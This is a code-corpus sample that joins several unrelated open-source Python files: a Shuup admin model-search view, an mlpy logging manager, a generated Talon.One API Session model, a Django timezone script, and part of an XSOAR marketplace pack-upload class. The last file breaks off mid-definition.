key = "%sname" % ("translations__" if hasattr(cls, "translations") else "")
self.search_fields.append(key)
if issubclass(cls, Contact):
self.search_fields.append("email")
if issubclass(cls, Product):
self.search_fields.append("sku")
self.search_fields.append("barcode")
user_model = get_user_model()
if issubclass(cls, user_model):
if _field_exists(user_model, "username"):
self.search_fields.append("username")
if _field_exists(user_model, "email"):
self.search_fields.append("email")
if not _field_exists(user_model, "name"):
self.search_fields.remove("name")
def get_data(self, request, *args, **kwargs):
model_name = request.GET.get("model")
if not model_name:
return []
cls = apps.get_model(model_name)
qs = cls.objects.all()
if hasattr(cls.objects, "all_except_deleted"):
qs = cls.objects.all_except_deleted()
self.init_search_fields(cls)
if not self.search_fields:
return [{"id": None, "name": _("Couldn't get selections for %s.") % model_name}]
if request.GET.get("search"):
query = Q()
keyword = request.GET.get("search", "").strip()
for field in self.search_fields:
query |= Q(**{"%s__icontains" % field: keyword})
if issubclass(cls, Contact) or issubclass(cls, get_user_model()):
query &= Q(is_active=True)
qs = qs.filter(query).distinct()
return [{"id": obj.id, "name": force_text(obj)} for obj in qs[:self.result_limit]]
def get(self, request, *args, **kwargs):
return JsonResponse({"results": self.get_data(request, *args, **kwargs)})
| hrayr-artunyan/shuup | shuup/admin/views/select.py | Python | agpl-3.0 | 2,842 | 0.001407 |
from __future__ import division, print_function, absolute_import
import os
import logging
from datetime import datetime
from ..modules.patterns import Singleton
class SilenceableStreamHandler(logging.StreamHandler):
def __init__(self, *args, **kwargs):
super(SilenceableStreamHandler, self).__init__(*args, **kwargs)
self.silenced = False
def emit(self, record):
if not self.silenced:
super(SilenceableStreamHandler, self).emit(record)
class SilenceableFileHandler(logging.FileHandler):
def __init__(self, *args, **kwargs):
super(SilenceableFileHandler, self).__init__(*args, **kwargs)
self.silenced = False
def emit(self, record):
if not self.silenced:
super(SilenceableFileHandler, self).emit(record)
class LoggingMgr(object):
"""The logging manager :class:`.Singleton` class.
The logger manager can be included as a member to any class to
manager logging of information. Each logger is identified by
the module id (`mid`), with which the logger settings can be
changed.
By default a logger with log level LOG_INFO that is output to the stdout
is created.
Attributes
----------
LOG_TYPE_STREAM=0
Log only to output stream (stdout).
LOG_TYPE_FILE=1
Log only to an output file.
LOG_TYPE_ALL=2
Log to both output stream (stdout) and file.
LOG_DEBUG=10
Detailed information, typically of interest only when diagnosing problems.
LOG_INFO=20
Confirmation that things are working as expected.
LOG_WARNING=30
An indication that something unexpected happened, or indicative
of some problem in the near future. The software is still working as expected.
LOG_ERROR=40
Due to a more serious problem, the software has not been able to perform some
function.
LOG_CRITICAL=50
A serious error, indicating that the problem itself may be unable to continue
running.
See Also
--------
:mod:`logging`
Examples
--------
>>> from mlpy.tools.log import LoggingMgr
>>> logger = LoggingMgr().get_logger('my_id')
>>> logger.info('This is a useful information.')
This gets a new logger. If a logger with the module id `my_id` already exists
that logger will be returned, otherwise a logger with the default settings is
created.
>>> LoggingMgr().add_handler('my_id', htype=LoggingMgr.LOG_TYPE_FILE)
This adds a new handler for the logger with module id `my_id` writing the logs
to a file.
>>> LoggingMgr().remove_handler('my_id', htype=LoggingMgr.LOG_TYPE_STREAM)
This removes the stream handler from the logger with module id `my_id`.
>>> LoggingMgr().change_level('my_id', LoggingMgr.LOG_TYPE_ALL, LoggingMgr.LOG_DEBUG)
This changes the log level for all attached handlers of the logger identified by
`my_id` to LOG_DEBUG.
"""
__metaclass__ = Singleton
LOG_TYPE_STREAM = 0
LOG_TYPE_FILE = 1
LOG_TYPE_ALL = 2
LOG_DEBUG = logging.DEBUG
LOG_INFO = logging.INFO
LOG_WARNING = logging.WARNING
LOG_ERROR = logging.ERROR
LOG_CRITICAL = logging.CRITICAL
def __init__(self):
self._loggers = {}
self._verbosity = {}
self._filename = None
def get_verbosity(self, mid):
""" Gets the verbosity.
The current setting of the verbosity of the logger identified
by `mid` is returned.
Parameters
----------
mid : str
The module id of the logger to change the verbosity of.
Returns
-------
bool :
Whether to turn the verbosity on or off.
"""
return self._verbosity[mid]
def set_verbosity(self, mid, value):
"""Sets the verbosity.
Turn logging on/off for logger identified by `mid`.
Parameters
----------
mid : str
The module id of the logger to change the verbosity of.
value : bool
Whether to turn the verbosity on or off.
"""
handlers = self._loggers[mid].handlers
for hdl in handlers:
hdl.silenced = value
def get_logger(self, mid, level=LOG_INFO, htype=LOG_TYPE_STREAM, fmt=None, verbose=True, filename=None):
"""Get the logger instance with the identified `mid`.
If a logger with the `mid` does not exist, a new logger will be created with the given settings.
By default only a stream handler is attached to the logger.
Parameters
----------
mid : str
The module id of the logger.
level : int, optional
The top level logging level. Default is LOG_INFO.
htype : int, optional
The logging type of handler. Default is LOG_TYPE_STREAM.
fmt : str, optional
The format in which the information is presented.
Default is "[%(levelname)-8s ] %(name)s: %(funcName)s: %(message)s"
verbose : bool, optional
The verbosity setting of the logger. Default is True
filename : str, optional
The name of the file the file handler writes the logs to.
Default is a generated filename.
Returns
-------
The logging instance.
"""
if mid not in self._loggers:
logger = logging.getLogger(mid)
logger.setLevel(level)
self._loggers[mid] = logger
self._verbosity[mid] = verbose if verbose is not None else True
self.add_handler(mid, htype, level, fmt, filename)
return self._loggers[mid]
def add_handler(self, mid, htype=LOG_TYPE_STREAM, hlevel=LOG_INFO, fmt=None, filename=None):
"""Add a handler to the logger.
Parameters
----------
mid : str
The module id of the logger
htype : int, optional
The logging type to add to the handler. Default is LOG_TYPE_STREAM.
hlevel : int, optional
The logging level. Default is LOG_INFO.
fmt : str, optional
The format in which the information is presented.
Default is "[%(levelname)-8s ] %(name)s: %(funcName)s: %(message)s"
filename : str, optional
The name of the file the file handler writes the logs to.
Default is a generated filename.
"""
if fmt is None:
fmt = "[%(levelname)-8s ] %(name)s: %(funcName)s: %(message)s"
formatter = logging.Formatter(fmt)
if htype == self.LOG_TYPE_STREAM or htype == self.LOG_TYPE_ALL:
handler = SilenceableStreamHandler()
self._add_handler(mid, hlevel, handler, formatter)
if htype == self.LOG_TYPE_FILE or htype == self.LOG_TYPE_ALL:
if self._filename is None:
if not os.path.exists("logs"):
os.makedirs("logs")
dt = datetime.now().strftime("%Y-%m-%d %H-%M-%S")
self._filename = "logs\logfile " + dt + ".log"
filename = filename if filename is not None else self._filename
handler = SilenceableFileHandler(filename)
self._add_handler(mid, hlevel, handler, formatter)
def remove_handler(self, mid, htype):
"""Remove handlers.
Removes all handlers of the given handler type from the logger.
Parameters
----------
mid : str
The module id of the logger
htype : int
The logging type to remove from the handler.
"""
handlers = self._loggers[mid].handlers
for hdl in handlers:
if htype == self.LOG_TYPE_FILE and isinstance(hdl, logging.FileHandler):
self._loggers[mid].removeHandler(hdl)
elif htype == self.LOG_TYPE_STREAM and isinstance(hdl, logging.StreamHandler):
self._loggers[mid].removeHandler(hdl)
def change_level(self, mid, hlevel, htype=LOG_TYPE_ALL):
"""Set the log level for a handler.
Parameters
----------
mid : str
The module id of the logger
hlevel : int
The logging level.
htype : int, optional
The logging type of handler for which to change the
log level. Default is LOG_TYPE_ALL.
"""
handlers = self._loggers[mid].handlers
if hlevel < self._loggers[mid].level:
self._loggers[mid].level = hlevel
for hdl in handlers:
if htype == self.LOG_TYPE_ALL:
hdl.level = hlevel
elif htype == self.LOG_TYPE_FILE and isinstance(hdl, logging.FileHandler):
hdl.level = hlevel
elif htype == self.LOG_TYPE_STREAM and isinstance(hdl, logging.StreamHandler):
hdl.level = hlevel
def _add_handler(self, mid, hlevel, handler, formatter):
handler.setLevel(hlevel)
handler.setFormatter(formatter)
self._loggers[mid].addHandler(handler)
| evenmarbles/mlpy | mlpy/tools/log.py | Python | mit | 9,057 | 0.001877 |
# coding: utf-8
"""
Talon.One API
The Talon.One API is used to manage applications and campaigns, as well as to integrate with your application. The operations in the _Integration API_ section are used to integrate with our platform, while the other operations are used to manage applications and campaigns. ### Where is the API? The API is available at the same hostname as these docs. For example, if you are reading this page at `https://mycompany.talon.one/docs/api/`, the URL for the [updateCustomerProfile][] operation is `https://mycompany.talon.one/v1/customer_profiles/id` [updateCustomerProfile]: #operation--v1-customer_profiles--integrationId--put # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from talon_one.configuration import Configuration
class Session(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'user_id': 'int',
'token': 'str',
'created': 'datetime'
}
attribute_map = {
'user_id': 'userId',
'token': 'token',
'created': 'created'
}
def __init__(self, user_id=None, token=None, created=None, local_vars_configuration=None): # noqa: E501
"""Session - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._user_id = None
self._token = None
self._created = None
self.discriminator = None
self.user_id = user_id
self.token = token
self.created = created
@property
def user_id(self):
"""Gets the user_id of this Session. # noqa: E501
The ID of the user of this session # noqa: E501
:return: The user_id of this Session. # noqa: E501
:rtype: int
"""
return self._user_id
@user_id.setter
def user_id(self, user_id):
"""Sets the user_id of this Session.
The ID of the user of this session # noqa: E501
:param user_id: The user_id of this Session. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and user_id is None: # noqa: E501
raise ValueError("Invalid value for `user_id`, must not be `None`") # noqa: E501
self._user_id = user_id
@property
def token(self):
"""Gets the token of this Session. # noqa: E501
An opaque session identifier # noqa: E501
:return: The token of this Session. # noqa: E501
:rtype: str
"""
return self._token
@token.setter
def token(self, token):
"""Sets the token of this Session.
An opaque session identifier # noqa: E501
:param token: The token of this Session. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and token is None: # noqa: E501
raise ValueError("Invalid value for `token`, must not be `None`") # noqa: E501
self._token = token
@property
def created(self):
"""Gets the created of this Session. # noqa: E501
Unix timestamp indicating when the session was first created. # noqa: E501
:return: The created of this Session. # noqa: E501
:rtype: datetime
"""
return self._created
@created.setter
def created(self, created):
"""Sets the created of this Session.
Unix timestamp indicating when the session was first created. # noqa: E501
:param created: The created of this Session. # noqa: E501
:type: datetime
"""
if self.local_vars_configuration.client_side_validation and created is None: # noqa: E501
raise ValueError("Invalid value for `created`, must not be `None`") # noqa: E501
self._created = created
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Session):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, Session):
return True
return self.to_dict() != other.to_dict()
| talon-one/talon_one.py | talon_one/models/session.py | Python | mit | 5,860 | 0 |
from django.utils import timezone
t = timezone.get_current_timezone()
for s in Sleep.objects.all():
if timezone.is_aware(s.start_time): s.start_time = timezone.make_naive(s.start_time, t)
if timezone.is_aware(s.end_time): s.end_time = timezone.make_naive(s.end_time,t)
s.save()
| sleepers-anonymous/zscore | useful_scripts/timezones.py | Python | mit | 292 | 0.017123 |
import base64
import fnmatch
import glob
import json
import os
import re
import shutil
import stat
import subprocess
import urllib.parse
import warnings
from datetime import datetime, timedelta
from distutils.util import strtobool
from distutils.version import LooseVersion
from typing import Tuple, Any, Union, List, Dict, Optional
from zipfile import ZipFile, ZIP_DEFLATED
import git
import google.auth
import sys
import yaml
from google.cloud import storage
import Tests.Marketplace.marketplace_statistics as mp_statistics
from Tests.Marketplace.marketplace_constants import PackFolders, Metadata, GCPConfig, BucketUploadFlow, PACKS_FOLDER, \
PackTags, PackIgnored, Changelog
from Utils.release_notes_generator import aggregate_release_notes_for_marketplace
from Tests.scripts.utils import logging_wrapper as logging
class Pack(object):
""" Class that manipulates and manages the upload of pack's artifact and metadata to cloud storage.
Args:
pack_name (str): Pack root folder name.
pack_path (str): Full path to pack folder.
Attributes:
PACK_INITIAL_VERSION (str): pack initial version that will be used as default.
CHANGELOG_JSON (str): changelog json full name, may be changed in the future.
README (str): pack's readme file name.
METADATA (str): pack's metadata file name, the one that will be deployed to cloud storage.
USER_METADATA (str); user metadata file name, the one that located in content repo.
EXCLUDE_DIRECTORIES (list): list of directories to excluded before uploading pack zip to storage.
AUTHOR_IMAGE_NAME (str): author image file name.
RELEASE_NOTES (str): release notes folder name.
"""
PACK_INITIAL_VERSION = "1.0.0"
CHANGELOG_JSON = "changelog.json"
README = "README.md"
USER_METADATA = "pack_metadata.json"
METADATA = "metadata.json"
AUTHOR_IMAGE_NAME = "Author_image.png"
EXCLUDE_DIRECTORIES = [PackFolders.TEST_PLAYBOOKS.value]
RELEASE_NOTES = "ReleaseNotes"
def __init__(self, pack_name, pack_path):
self._pack_name = pack_name
self._pack_path = pack_path
self._status = None
self._public_storage_path = ""
self._remove_files_list = [] # tracking temporary files, in order to delete in later step
self._server_min_version = "99.99.99" # initialized min version
self._latest_version = None # pack latest version found in changelog
self._support_type = None # initialized in load_user_metadata function
self._current_version = None # initialized in load_user_metadata function
self._hidden = False # initialized in load_user_metadata function
self._description = None # initialized in load_user_metadata function
self._display_name = None # initialized in load_user_metadata function
self._user_metadata = None # initialized in load_user_metadata function
self.eula_link = None # initialized in load_user_metadata function
self._is_feed = False # a flag that specifies if pack is a feed pack
self._downloads_count = 0 # number of pack downloads
self._bucket_url = None # URL of where the pack was uploaded.
self._aggregated = False # weather the pack's rn was aggregated or not.
self._aggregation_str = "" # the aggregation string msg when the pack versions are aggregated
self._create_date = None # initialized in enhance_pack_attributes function
self._update_date = None # initialized in enhance_pack_attributes function
self._uploaded_author_image = False # whether the pack author image was uploaded or not
self._uploaded_integration_images = [] # the list of all integration images that were uploaded for the pack
self._support_details = None # initialized in enhance_pack_attributes function
self._author = None # initialized in enhance_pack_attributes function
self._certification = None # initialized in enhance_pack_attributes function
self._legacy = None # initialized in enhance_pack_attributes function
self._author_image = None # initialized in upload_author_image function
self._displayed_integration_images = None # initialized in upload_integration_images function
self._price = 0 # initialized in enhance_pack_attributes function
self._is_private_pack = False # initialized in enhance_pack_attributes function
self._is_premium = False # initialized in enhance_pack_attributes function
self._vendor_id = None # initialized in enhance_pack_attributes function
self._partner_id = None # initialized in enhance_pack_attributes function
self._partner_name = None # initialized in enhance_pack_attributes function
self._content_commit_hash = None # initialized in enhance_pack_attributes function
self._preview_only = None # initialized in enhance_pack_attributes function
self._tags = None # initialized in enhance_pack_attributes function
self._categories = None # initialized in enhance_pack_attributes function
self._content_items = None # initialized in collect_content_items function
self._search_rank = None # initialized in enhance_pack_attributes function
self._related_integration_images = None # initialized in enhance_pack_attributes function
self._use_cases = None # initialized in enhance_pack_attributes function
self._keywords = None # initialized in enhance_pack_attributes function
self._dependencies = None # initialized in enhance_pack_attributes function
self._pack_statistics_handler = None # initialized in enhance_pack_attributes function
self._contains_transformer = False # initialized in collect_content_items function
self._contains_filter = False # initialized in collect_content_items function
self._is_missing_dependencies = False # a flag that specifies if pack is missing dependencies
@property
def name(self):
""" str: pack root folder name.
"""
return self._pack_name
@property
def path(self):
""" str: pack folder full path.
"""
return self._pack_path
@property
def latest_version(self):
""" str: pack latest version from sorted keys of changelog.json file.
"""
if not self._latest_version:
self._latest_version = self._get_latest_version()
return self._latest_version
else:
return self._latest_version
@latest_version.setter
def latest_version(self, latest_version):
self._latest_version = latest_version
@property
def status(self):
""" str: current status of the packs.
"""
return self._status
@property
def is_feed(self):
"""
bool: whether the pack is a feed pack
"""
return self._is_feed
@is_feed.setter
def is_feed(self, is_feed):
""" setter of is_feed
"""
self._is_feed = is_feed
@status.setter # type: ignore[attr-defined,no-redef]
def status(self, status_value):
""" setter of pack current status.
"""
self._status = status_value
@property
def public_storage_path(self):
""" str: public gcs path of uploaded pack.
"""
return self._public_storage_path
@public_storage_path.setter
def public_storage_path(self, path_value):
""" setter of public gcs path of uploaded pack.
"""
self._public_storage_path = path_value
@property
def support_type(self):
""" str: support type of the pack.
"""
return self._support_type
@support_type.setter
def support_type(self, support_value):
""" setter of support type of the pack.
"""
self._support_type = support_value
@property
def current_version(self):
""" str: current version of the pack (different from latest_version).
"""
return self._current_version
@current_version.setter
def current_version(self, current_version_value):
""" setter of current version of the pack.
"""
self._current_version = current_version_value
@property
def hidden(self):
""" bool: internal content field for preventing pack from being displayed.
"""
return self._hidden
@hidden.setter
def hidden(self, hidden_value):
""" setter of hidden property of the pack.
"""
self._hidden = hidden_value
@property
def description(self):
""" str: Description of the pack (found in pack_metadata.json).
"""
return self._description
@description.setter
def description(self, description_value):
""" setter of description property of the pack.
"""
self._description = description_value
@property
def display_name(self):
""" str: Display name of the pack (found in pack_metadata.json).
"""
return self._display_name
@property
def user_metadata(self):
""" dict: the pack_metadata.
"""
return self._user_metadata
@display_name.setter # type: ignore[attr-defined,no-redef]
def display_name(self, display_name_value):
""" setter of display name property of the pack.
"""
self._display_name = display_name_value
@property
def server_min_version(self):
""" str: server min version according to collected items.
"""
if not self._server_min_version or self._server_min_version == "99.99.99":
return Metadata.SERVER_DEFAULT_MIN_VERSION
else:
return self._server_min_version
@property
def downloads_count(self):
""" str: packs downloads count.
"""
return self._downloads_count
@downloads_count.setter
def downloads_count(self, download_count_value):
""" setter of downloads count property of the pack.
"""
self._downloads_count = download_count_value
@property
def bucket_url(self):
""" str: pack bucket_url.
"""
return self._bucket_url
@bucket_url.setter
def bucket_url(self, bucket_url):
""" str: pack bucket_url.
"""
self._bucket_url = bucket_url
@property
def aggregated(self):
""" str: pack aggregated release notes or not.
"""
return self._aggregated
@property
def aggregation_str(self):
""" str: pack aggregated release notes or not.
"""
return self._aggregation_str
@property
def create_date(self):
""" str: pack create date.
"""
return self._create_date
@create_date.setter
def create_date(self, value):
self._create_date = value
@property
def update_date(self):
""" str: pack update date.
"""
return self._update_date
@update_date.setter
def update_date(self, value):
self._update_date = value
@property
def uploaded_author_image(self):
""" bool: whether the pack author image was uploaded or not.
"""
return self._uploaded_author_image
@uploaded_author_image.setter
def uploaded_author_image(self, uploaded_author_image):
""" bool: whether the pack author image was uploaded or not.
"""
self._uploaded_author_image = uploaded_author_image
@property
def uploaded_integration_images(self):
""" str: the list of uploaded integration images
"""
return self._uploaded_integration_images
@property
def is_missing_dependencies(self):
return self._is_missing_dependencies
def _get_latest_version(self):
""" Return latest semantic version of the pack.
In case that changelog.json file was not found, default value of 1.0.0 will be returned.
Otherwise, keys of semantic pack versions will be collected and sorted in descending and return latest version.
For additional information regarding changelog.json format go to issue #19786
Returns:
str: Pack latest version.
"""
changelog_path = os.path.join(self._pack_path, Pack.CHANGELOG_JSON)
if not os.path.exists(changelog_path):
return self.PACK_INITIAL_VERSION
with open(changelog_path, "r") as changelog_file:
changelog = json.load(changelog_file)
pack_versions = [LooseVersion(v) for v in changelog.keys()]
pack_versions.sort(reverse=True)
return pack_versions[0].vstring
@staticmethod
def organize_integration_images(pack_integration_images: list, pack_dependencies_integration_images_dict: dict,
pack_dependencies_by_download_count: list):
""" By Issue #32038
1. Sort pack integration images by alphabetical order
2. Sort pack dependencies by download count
Pack integration images are shown before pack dependencies integration images
Args:
pack_integration_images (list): list of pack integration images
pack_dependencies_integration_images_dict: a mapping of pack dependency name to its integration images
pack_dependencies_by_download_count: a list of pack dependencies sorted by download count
Returns:
list: list of sorted integration images
"""
def sort_by_name(integration_image: dict):
return integration_image.get('name', '')
# sort packs integration images
pack_integration_images = sorted(pack_integration_images, key=sort_by_name)
# sort pack dependencies integration images
all_dep_int_imgs = pack_integration_images
for dep_pack_name in pack_dependencies_by_download_count:
if dep_pack_name in pack_dependencies_integration_images_dict:
logging.info(f'Adding {dep_pack_name} to deps int imgs')
dep_int_imgs = sorted(pack_dependencies_integration_images_dict[dep_pack_name], key=sort_by_name)
for dep_int_img in dep_int_imgs:
if dep_int_img not in all_dep_int_imgs: # avoid duplicates
all_dep_int_imgs.append(dep_int_img)
return all_dep_int_imgs
@staticmethod
def _get_all_pack_images(pack_integration_images, display_dependencies_images, dependencies_data,
pack_dependencies_by_download_count):
""" Returns data of uploaded pack integration images and it's path in gcs. Pack dependencies integration images
are added to that result as well.
Args:
pack_integration_images (list): list of uploaded to gcs integration images and it paths in gcs.
display_dependencies_images (list): list of pack names of additional dependencies images to display.
dependencies_data (dict): all level dependencies data.
pack_dependencies_by_download_count (list): list of pack names that are dependencies of the given pack
sorted by download count.
Returns:
list: collection of integration display name and it's path in gcs.
"""
dependencies_integration_images_dict: dict = {}
additional_dependencies_data = {k: v for k, v in dependencies_data.items() if k in display_dependencies_images}
for dependency_data in additional_dependencies_data.values():
for dep_int_img in dependency_data.get('integrations', []):
dep_int_img_gcs_path = dep_int_img.get('imagePath', '') # image public url
dep_int_img['name'] = Pack.remove_contrib_suffix_from_name(dep_int_img.get('name', ''))
dep_pack_name = os.path.basename(os.path.dirname(dep_int_img_gcs_path))
if dep_pack_name not in display_dependencies_images:
continue # skip if integration image is not part of displayed images of the given pack
if dep_int_img not in pack_integration_images: # avoid duplicates in list
if dep_pack_name in dependencies_integration_images_dict:
dependencies_integration_images_dict[dep_pack_name].append(dep_int_img)
else:
dependencies_integration_images_dict[dep_pack_name] = [dep_int_img]
return Pack.organize_integration_images(
pack_integration_images, dependencies_integration_images_dict, pack_dependencies_by_download_count
)
def is_feed_pack(self, yaml_content, yaml_type):
"""
Checks if an integration is a feed integration. If so, updates Pack._is_feed
Args:
yaml_content: The yaml content extracted by yaml.safe_load().
yaml_type: The type of object to check. Should be 'Playbook' or 'Integration'.
Returns:
Doesn't return
"""
if yaml_type == 'Integration':
if yaml_content.get('script', {}).get('feed', False) is True:
self._is_feed = True
if yaml_type == 'Playbook':
if yaml_content.get('name').startswith('TIM '):
self._is_feed = True
@staticmethod
def _clean_release_notes(release_notes_lines):
return re.sub(r'<\!--.*?-->', '', release_notes_lines, flags=re.DOTALL)
@staticmethod
def _parse_pack_dependencies(first_level_dependencies, all_level_pack_dependencies_data):
""" Parses user defined dependencies and returns dictionary with relevant data about each dependency pack.
Args:
first_level_dependencies (dict): first lever dependencies that were retrieved
from user pack_metadata.json file.
all_level_pack_dependencies_data (dict): all level pack dependencies data.
Returns:
dict: parsed dictionary with pack dependency data.
"""
parsed_result = {}
dependencies_data = {k: v for (k, v) in all_level_pack_dependencies_data.items()
if k in first_level_dependencies.keys() or k == GCPConfig.BASE_PACK}
for dependency_id, dependency_data in dependencies_data.items():
parsed_result[dependency_id] = {
"mandatory": first_level_dependencies.get(dependency_id, {}).get('mandatory', True),
"minVersion": dependency_data.get(Metadata.CURRENT_VERSION, Pack.PACK_INITIAL_VERSION),
"author": dependency_data.get('author', ''),
"name": dependency_data.get('name') if dependency_data.get('name') else dependency_id,
"certification": dependency_data.get('certification', 'certified')
}
return parsed_result
@staticmethod
def _create_support_section(support_type, support_url=None, support_email=None):
""" Creates support dictionary that is part of metadata.
In case of support type xsoar, adds default support url. If support is xsoar and support url is defined and
doesn't match xsoar default url, warning is raised.
Args:
support_type (str): support type of pack.
support_url (str): support full url.
support_email (str): support email address.
Returns:
dict: supported data dictionary.
"""
support_details = {}
if support_url: # set support url from user input
support_details['url'] = support_url
elif support_type == Metadata.XSOAR_SUPPORT: # in case support type is xsoar, set default xsoar support url
support_details['url'] = Metadata.XSOAR_SUPPORT_URL
# add support email if defined
if support_email:
support_details['email'] = support_email
return support_details
@staticmethod
def _get_author(support_type, author=None):
""" Returns pack author. In case support type is xsoar, more additional validation are applied.
Args:
support_type (str): support type of pack.
author (str): author of the pack.
Returns:
str: returns author from the input.
"""
if support_type == Metadata.XSOAR_SUPPORT and not author:
return Metadata.XSOAR_AUTHOR # returned xsoar default author
elif support_type == Metadata.XSOAR_SUPPORT and author != Metadata.XSOAR_AUTHOR:
logging.warning(f"{author} author doest not match {Metadata.XSOAR_AUTHOR} default value")
return author
else:
return author
@staticmethod
def _get_certification(support_type, certification=None):
""" Returns pack certification.
In case support type is xsoar or partner, CERTIFIED is returned.
In case support is not xsoar or partner but pack_metadata has certification field, certification value will be
taken from pack_metadata defined value.
Otherwise empty certification value (empty string) will be returned
Args:
support_type (str): support type of pack.
certification (str): certification value from pack_metadata, if exists.
Returns:
str: certification value
"""
if support_type in [Metadata.XSOAR_SUPPORT, Metadata.PARTNER_SUPPORT]:
return Metadata.CERTIFIED
elif certification:
return certification
else:
return ""
def _get_tags_from_landing_page(self, landing_page_sections: dict) -> set:
"""
Build the pack's tag list according to the user metadata and the landingPage sections file.
Args:
landing_page_sections (dict): landingPage sections and the packs in each one of them.
Returns:
set: Pack's tags.
"""
tags = set()
sections = landing_page_sections.get('sections', []) if landing_page_sections else []
for section in sections:
if self._pack_name in landing_page_sections.get(section, []):
tags.add(section)
return tags
def _parse_pack_metadata(self, build_number, commit_hash):
""" Parses pack metadata according to issue #19786 and #20091. Part of field may change over the time.
Args:
build_number (str): circleCI build number.
commit_hash (str): current commit hash.
Returns:
dict: parsed pack metadata.
"""
pack_metadata = {
Metadata.NAME: self._display_name or self._pack_name,
Metadata.ID: self._pack_name,
Metadata.DESCRIPTION: self._description or self._pack_name,
Metadata.CREATED: self._create_date,
Metadata.UPDATED: self._update_date,
Metadata.LEGACY: self._legacy,
Metadata.SUPPORT: self._support_type,
Metadata.SUPPORT_DETAILS: self._support_details,
Metadata.EULA_LINK: self.eula_link,
Metadata.AUTHOR: self._author,
Metadata.AUTHOR_IMAGE: self._author_image,
Metadata.CERTIFICATION: self._certification,
Metadata.PRICE: self._price,
Metadata.SERVER_MIN_VERSION: self.user_metadata.get(Metadata.SERVER_MIN_VERSION) or self.server_min_version,
Metadata.CURRENT_VERSION: self.user_metadata.get(Metadata.CURRENT_VERSION, ''),
Metadata.VERSION_INFO: build_number,
Metadata.COMMIT: commit_hash,
Metadata.DOWNLOADS: self._downloads_count,
Metadata.TAGS: list(self._tags or []),
Metadata.CATEGORIES: self._categories,
Metadata.CONTENT_ITEMS: self._content_items,
Metadata.SEARCH_RANK: self._search_rank,
Metadata.INTEGRATIONS: self._related_integration_images,
Metadata.USE_CASES: self._use_cases,
Metadata.KEY_WORDS: self._keywords,
Metadata.DEPENDENCIES: self._dependencies
}
if self._is_private_pack:
pack_metadata.update({
Metadata.PREMIUM: self._is_premium,
Metadata.VENDOR_ID: self._vendor_id,
Metadata.PARTNER_ID: self._partner_id,
Metadata.PARTNER_NAME: self._partner_name,
Metadata.CONTENT_COMMIT_HASH: self._content_commit_hash,
Metadata.PREVIEW_ONLY: self._preview_only
})
return pack_metadata
def _load_pack_dependencies(self, index_folder_path, pack_names):
""" Loads dependencies metadata and returns mapping of pack id and it's loaded data.
Args:
index_folder_path (str): full path to download index folder.
pack_names (set): List of all packs.
Returns:
dict: pack id as key and loaded metadata of packs as value.
bool: True if the pack is missing dependencies, False otherwise.
"""
dependencies_data_result = {}
first_level_dependencies = self.user_metadata.get(Metadata.DEPENDENCIES, {})
all_level_displayed_dependencies = self.user_metadata.get(Metadata.DISPLAYED_IMAGES, [])
dependencies_ids = {d for d in first_level_dependencies.keys()}
dependencies_ids.update(all_level_displayed_dependencies)
if self._pack_name != GCPConfig.BASE_PACK: # check that current pack isn't Base Pack in order to prevent loop
dependencies_ids.add(GCPConfig.BASE_PACK) # Base pack is always added as pack dependency
for dependency_pack_id in dependencies_ids:
dependency_metadata_path = os.path.join(index_folder_path, dependency_pack_id, Pack.METADATA)
if os.path.exists(dependency_metadata_path):
with open(dependency_metadata_path, 'r') as metadata_file:
dependency_metadata = json.load(metadata_file)
dependencies_data_result[dependency_pack_id] = dependency_metadata
elif dependency_pack_id in pack_names:
# If the pack is dependent on a new pack (which is not yet in the index.json)
# we will note that it is missing dependencies.
# And finally after updating all the packages in index.json.
# We will go over the pack again to add what was missing
self._is_missing_dependencies = True
logging.warning(f"{self._pack_name} pack dependency with id {dependency_pack_id} "
f"was not found in index, marking it as missing dependencies - to be resolved in next"
f" iteration over packs")
else:
logging.warning(f"{self._pack_name} pack dependency with id {dependency_pack_id} was not found")
return dependencies_data_result, self._is_missing_dependencies
@staticmethod
def _get_updated_changelog_entry(changelog: dict, version: str, release_notes: str = None,
version_display_name: str = None, build_number_with_prefix: str = None,
released_time: str = None):
"""
Args:
changelog (dict): The changelog from the production bucket.
version (str): The version that is the key in the changelog of the entry wished to be updated.
release_notes (str): The release notes lines to update the entry with.
version_display_name (str): The version display name to update the entry with.
build_number_with_prefix(srt): the build number to modify the entry to, including the prefix R (if present).
released_time: The released time to update the entry with.
"""
changelog_entry = changelog.get(version)
if not changelog_entry:
raise Exception('The given version is not a key in the changelog')
version_display_name = \
version_display_name if version_display_name else changelog_entry[Changelog.DISPLAY_NAME].split('-')[0]
build_number_with_prefix = \
build_number_with_prefix if build_number_with_prefix else \
changelog_entry[Changelog.DISPLAY_NAME].split('-')[1]
changelog_entry[Changelog.RELEASE_NOTES] = release_notes if release_notes else changelog_entry[
Changelog.RELEASE_NOTES]
changelog_entry[Changelog.DISPLAY_NAME] = f'{version_display_name} - {build_number_with_prefix}'
changelog_entry[Changelog.RELEASED] = released_time if released_time else changelog_entry[Changelog.RELEASED]
return changelog_entry
def _create_changelog_entry(self, release_notes, version_display_name, build_number, pack_was_modified=False,
new_version=True, initial_release=False):
""" Creates dictionary entry for changelog.
Args:
